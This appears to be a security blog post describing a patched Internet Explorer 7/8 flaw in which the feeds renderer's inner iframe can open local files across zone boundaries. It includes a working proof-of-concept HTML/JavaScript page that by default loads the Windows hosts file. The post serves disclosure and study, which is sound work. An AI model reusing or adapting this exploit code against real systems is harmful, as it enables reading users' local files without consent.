Load Local Files via Feeds IFrame open Method

The IE Feeds WebBrowser control generates a nested iframe when rendering feed content. The open method of that inner iframe is not properly sandboxed — it can load local files. Calling ifr_Feeds[0].open("local_path", "target_frame") bypasses the zone restrictions that normally prevent web content from accessing the filesystem.

<iframe name="ifr_Feeds" src="feeds.xml" width="300" height="200"></iframe>
<iframe name="ifr_Target" width="500" height="200"></iframe>

<script language="JavaScript">
function main()
{
    ifr_Feeds[0].open(document.all.filePath.value, "ifr_Target");
}
</script>

<input type="button" onclick="main();" value="Navigate">
<input type="text" size="50" id="filePath" value="c:\windows\system32\drivers\etc\hosts">

The ifr_Feeds[0] reference points to the inner iframe that IE auto-generates inside the feeds renderer. Using ifr_Feeds itself as the target also works, but this version keeps the feeds frame alive for repeated testing. The bug is distinct from an earlier feeds UXSS (WOOBR #973093), which was correctly patched. Tested on IE7/Vista, IE8/Win7, and IE8/XP.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE8 DoS — Non-HTML Content Opened in createPopup OBJECT] :: [Silverlight 4 Pentest I] >